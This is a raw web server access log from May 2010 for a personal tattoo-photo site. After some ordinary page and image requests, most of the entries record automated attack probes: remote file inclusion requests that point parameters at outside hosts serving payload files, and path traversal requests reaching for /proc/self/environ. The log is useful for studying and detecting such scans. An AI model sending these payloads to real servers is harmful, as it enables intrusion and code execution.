78.0.242.178 - - [11/May/2010:03:42:17 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
78.0.242.178 - - [11/May/2010:03:42:19 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
78.0.242.178 - - [11/May/2010:03:42:22 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
78.0.242.178 - - [11/May/2010:03:42:22 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
78.0.242.178 - - [11/May/2010:03:42:22 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
78.0.242.178 - - [11/May/2010:03:42:22 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
78.0.242.178 - - [11/May/2010:03:42:22 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
78.0.242.178 - - [11/May/2010:03:42:22 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
78.0.242.178 - - [11/May/2010:03:42:22 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
78.0.242.178 - - [11/May/2010:03:42:22 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
78.0.242.178 - - [11/May/2010:03:42:22 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
78.0.242.178 - - [11/May/2010:03:42:22 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
78.0.242.178 - - [11/May/2010:03:42:23 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
78.0.242.178 - - [11/May/2010:03:42:23 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
78.0.242.178 - - [11/May/2010:03:42:30 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
78.0.242.178 - - [11/May/2010:03:42:30 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
78.0.242.178 - - [11/May/2010:03:42:30 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
78.0.242.178 - - [11/May/2010:03:42:30 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
78.0.242.178 - - [11/May/2010:03:42:30 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
78.0.242.178 - - [11/May/2010:03:42:30 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
78.0.242.178 - - [11/May/2010:03:42:30 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
78.0.242.178 - - [11/May/2010:03:42:30 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
78.0.242.178 - - [11/May/2010:03:42:30 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
78.0.242.178 - - [11/May/2010:03:42:30 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
78.0.242.178 - - [11/May/2010:03:42:31 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
78.0.242.178 - - [11/May/2010:03:42:31 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
210.50.189.221 - - [11/May/2010:03:42:36 -0500] "GET //contenido.php?sec=http://www.sle.ro/a??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.250.255.243 - - [11/May/2010:03:42:37 -0500] "GET /logs/access_log.1220659200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
195.225.170.200 - - [11/May/2010:03:43:12 -0500] "GET /logs/access_log.1231718400//contenido.php?sec=http://www.sle.ro/a??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
195.225.170.200 - - [11/May/2010:03:43:12 -0500] "GET //contenido.php?sec=http://www.sle.ro/a??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
195.225.170.200 - - [11/May/2010:03:43:12 -0500] "GET /logs//contenido.php?sec=http://www.sle.ro/a??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
72.29.80.127 - - [11/May/2010:03:43:45 -0500] "GET /logs/access_log.1231718400//contenido.php?sec=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
72.29.80.127 - - [11/May/2010:03:43:45 -0500] "GET //contenido.php?sec=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
72.29.80.127 - - [11/May/2010:03:43:45 -0500] "GET /logs//contenido.php?sec=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
91.103.220.36 - - [11/May/2010:03:44:23 -0500] "GET /logs/access_log.1231718400//contenido.php?sec=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
91.103.220.36 - - [11/May/2010:03:44:23 -0500] "GET //contenido.php?sec=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
91.103.220.36 - - [11/May/2010:03:44:23 -0500] "GET /logs//contenido.php?sec=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
217.172.150.13 - - [11/May/2010:03:45:34 -0500] "GET /logs/access_log.1231718400//contenido.php?sec=http://www.sle.ro/a??? HTTP/1.1" 404 325 "-""libwww-perl/5.825"
217.172.150.13 - - [11/May/2010:03:45:34 -0500] "GET //contenido.php?sec=http://www.sle.ro/a??? HTTP/1.1" 404 298 "-""libwww-perl/5.825"
217.172.150.13 - - [11/May/2010:03:45:35 -0500] "GET /logs//contenido.php?sec=http://www.sle.ro/a??? HTTP/1.1" 404 303 "-""libwww-perl/5.825"
67.195.112.180 - - [11/May/2010:03:45:39 -0500] "GET /logs/access_log.1178755200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.169.241.213 - - [11/May/2010:03:46:28 -0500] "GET /logs/access_log.1231718400//contenido.php?sec=http://www.sle.ro/a??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
217.169.241.213 - - [11/May/2010:03:46:28 -0500] "GET //contenido.php?sec=http://www.sle.ro/a??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.169.241.213 - - [11/May/2010:03:46:29 -0500] "GET /logs//contenido.php?sec=http://www.sle.ro/a??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
194.108.112.112 - - [11/May/2010:03:47:05 -0500] "GET /logs/access_log.1231718400//contenido.php?sec=http://www.sle.ro/a??? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
194.108.112.112 - - [11/May/2010:03:47:05 -0500] "GET //contenido.php?sec=http://www.sle.ro/a??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
194.108.112.112 - - [11/May/2010:03:47:05 -0500] "GET /logs//contenido.php?sec=http://www.sle.ro/a??? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
212.94.64.154 - - [11/May/2010:03:49:57 -0500] "GET /logs/access_log.1266451200/?INCLUDE_FOLDER=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
212.94.64.154 - - [11/May/2010:03:49:57 -0500] "GET /?INCLUDE_FOLDER=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
212.94.64.154 - - [11/May/2010:03:49:57 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 200 5130 "-""Mozilla/5.0"
206.212.244.82 - - [11/May/2010:03:50:06 -0500] "GET /logs/access_log.1266451200/?INCLUDE_FOLDER=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
206.212.244.82 - - [11/May/2010:03:50:06 -0500] "GET /?INCLUDE_FOLDER=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
206.212.244.82 - - [11/May/2010:03:50:06 -0500] "GET /logs/?INCLUDE_FOLDER=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 200 5130 "-""Mozilla/5.0"
206.212.244.82 - - [11/May/2010:03:50:06 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
206.212.244.82 - - [11/May/2010:03:50:09 -0500] "GET /?INCLUDE_FOLDER=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
206.212.244.82 - - [11/May/2010:03:50:10 -0500] "GET /logs/?INCLUDE_FOLDER=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 200 5130 "-""Mozilla/5.0"
206.212.244.82 - - [11/May/2010:03:50:10 -0500] "GET /logs/access_log.1266451200/?INCLUDE_FOLDER=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
206.212.244.82 - - [11/May/2010:03:50:11 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
78.110.50.139 - - [11/May/2010:03:50:24 -0500] "GET /logs/access_log.1266451200/?INCLUDE_FOLDER=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
78.110.50.139 - - [11/May/2010:03:50:24 -0500] "GET /?INCLUDE_FOLDER=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
78.110.50.139 - - [11/May/2010:03:50:24 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 200 5130 "-""Mozilla/5.0"
78.110.50.139 - - [11/May/2010:03:50:46 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
77.221.130.20 - - [11/May/2010:03:50:49 -0500] "GET /logs/access_log.1266451200/?INCLUDE_FOLDER=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
77.221.130.20 - - [11/May/2010:03:50:49 -0500] "GET /?INCLUDE_FOLDER=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
77.221.130.20 - - [11/May/2010:03:50:49 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 200 5130 "-""Mozilla/5.0"
218.48.202.44 - - [11/May/2010:03:50:57 -0500] "GET /?INCLUDE_FOLDER=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
218.48.202.44 - - [11/May/2010:03:50:57 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 200 5130 "-""Mozilla/5.0"
218.48.202.44 - - [11/May/2010:03:50:57 -0500] "GET /logs/access_log.1266451200/?INCLUDE_FOLDER=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:03:51:03 -0500] "GET /logs/access_log.1266451200/?INCLUDE_FOLDER=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:03:51:03 -0500] "GET /logs/?INCLUDE_FOLDER=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 200 5130 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:03:51:03 -0500] "GET /?INCLUDE_FOLDER=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
218.48.202.44 - - [11/May/2010:03:51:05 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
77.221.130.20 - - [11/May/2010:03:51:12 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
212.94.64.154 - - [11/May/2010:03:51:15 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 200 5130 "-""Mozilla/5.0"
212.94.64.154 - - [11/May/2010:03:51:15 -0500] "GET /logs/access_log.1266451200/?INCLUDE_FOLDER=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
212.94.64.154 - - [11/May/2010:03:51:15 -0500] "GET /?INCLUDE_FOLDER=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:03:51:26 -0500] "GET /logs/access_log.1266451200/?INCLUDE_FOLDER=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:03:51:26 -0500] "GET /logs/?INCLUDE_FOLDER=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 200 5130 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:03:51:26 -0500] "GET /?INCLUDE_FOLDER=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:03:51:36 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:03:51:46 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
212.94.64.154 - - [11/May/2010:03:52:03 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
216.150.224.151 - - [11/May/2010:03:52:04 -0500] "GET /logs/access_log.1272067200/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.808"
174.136.55.175 - - [11/May/2010:03:52:04 -0500] "GET /logs/access_log.1272067200/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.823"
216.150.224.151 - - [11/May/2010:03:52:04 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
174.136.55.175 - - [11/May/2010:03:52:04 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.823"
216.150.224.151 - - [11/May/2010:03:52:05 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5130 "-""libwww-perl/5.808"
174.136.55.175 - - [11/May/2010:03:52:05 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5130 "-""libwww-perl/5.823"
174.121.77.90 - - [11/May/2010:03:52:16 -0500] "GET /logs/access_log.1272067200/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
174.121.77.90 - - [11/May/2010:03:52:16 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
174.121.77.90 - - [11/May/2010:03:52:16 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5130 "-""libwww-perl/5.810"
91.103.220.36 - - [11/May/2010:03:54:52 -0500] "GET /logs//index_principal.php?pagina=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
91.103.220.36 - - [11/May/2010:03:54:52 -0500] "GET //index_principal.php?pagina=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
76.236.30.6 - - [11/May/2010:03:55:10 -0500] "GET /logs/access_log.1161820800 HTTP/1.1" 404 310 "http://www.google.nl/search?q=128.154.26+.11&btnG=Zoeken&hl=nl&rls=com.microsoft%3Aen-us%3AIE-SearchBox&rlz=1I7GPCK_enUS379&sa=2""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)"
76.236.30.6 - - [11/May/2010:03:55:13 -0500] "GET /logs/access_log.1161820800 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)"
210.50.189.221 - - [11/May/2010:03:55:16 -0500] "GET /logs/access_log.1231718400//contenido.php?sec=http://www.sle.ro/a??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
210.50.189.221 - - [11/May/2010:03:55:19 -0500] "GET //contenido.php?sec=http://www.sle.ro/a??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
210.50.189.221 - - [11/May/2010:03:55:20 -0500] "GET /logs//contenido.php?sec=http://www.sle.ro/a??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
207.46.199.191 - - [11/May/2010:03:55:44 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.103.220.36 - - [11/May/2010:03:55:48 -0500] "GET //index_principal.php?pagina=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
72.29.80.127 - - [11/May/2010:03:55:49 -0500] "GET //index_principal.php?pagina=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
217.169.241.213 - - [11/May/2010:03:55:59 -0500] "GET //index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
195.225.170.200 - - [11/May/2010:03:56:12 -0500] "GET //index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
217.172.150.13 - - [11/May/2010:03:56:12 -0500] "GET //index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 304 "-""libwww-perl/5.825"
195.225.170.200 - - [11/May/2010:03:56:21 -0500] "GET /logs//index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
195.225.170.200 - - [11/May/2010:03:56:21 -0500] "GET //index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
80.88.16.30 - - [11/May/2010:03:56:26 -0500] "GET /logs/access_log.1272067200/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.826"
80.88.16.30 - - [11/May/2010:03:56:27 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.826"
80.88.16.30 - - [11/May/2010:03:56:27 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5130 "-""libwww-perl/5.826"
211.19.31.123 - - [11/May/2010:03:56:29 -0500] "GET /logs/access_log.1266537600//?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.19.31.123 - - [11/May/2010:03:56:30 -0500] "GET //?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
211.19.31.123 - - [11/May/2010:03:56:30 -0500] "GET /logs//?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 5135 "-""Mozilla/5.0"
211.19.31.123 - - [11/May/2010:03:56:30 -0500] "GET /logs/access_log.1264982400//?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
194.108.112.112 - - [11/May/2010:03:56:41 -0500] "GET //index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
72.29.80.127 - - [11/May/2010:03:56:42 -0500] "GET /logs//index_principal.php?pagina=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
72.29.80.127 - - [11/May/2010:03:56:42 -0500] "GET //index_principal.php?pagina=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
211.19.31.123 - - [11/May/2010:03:57:03 -0500] "GET //?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
211.19.31.123 - - [11/May/2010:03:57:04 -0500] "GET /logs//?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 5135 "-""Mozilla/5.0"
211.19.31.123 - - [11/May/2010:03:57:14 -0500] "GET /logs/access_log.1265760000//?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.19.31.123 - - [11/May/2010:03:57:14 -0500] "GET /logs/access_log.1263859200//?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
217.169.241.213 - - [11/May/2010:03:57:15 -0500] "GET /logs//index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
217.169.241.213 - - [11/May/2010:03:57:16 -0500] "GET //index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
194.108.112.112 - - [11/May/2010:03:57:32 -0500] "GET /logs//index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
194.108.112.112 - - [11/May/2010:03:57:33 -0500] "GET //index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
217.172.150.13 - - [11/May/2010:03:57:38 -0500] "GET /logs//index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 309 "-""libwww-perl/5.825"
217.172.150.13 - - [11/May/2010:03:57:38 -0500] "GET //index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 304 "-""libwww-perl/5.825"
87.250.255.243 - - [11/May/2010:03:58:04 -0500] "GET /logs/access_log.1242777600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
210.50.189.221 - - [11/May/2010:03:58:49 -0500] "GET //index_principal.php?pagina=http://www.sle.ro/a??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
91.103.220.36 - - [11/May/2010:03:59:49 -0500] "GET /logs/access_log.1270857600//index_principal.php?pagina=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
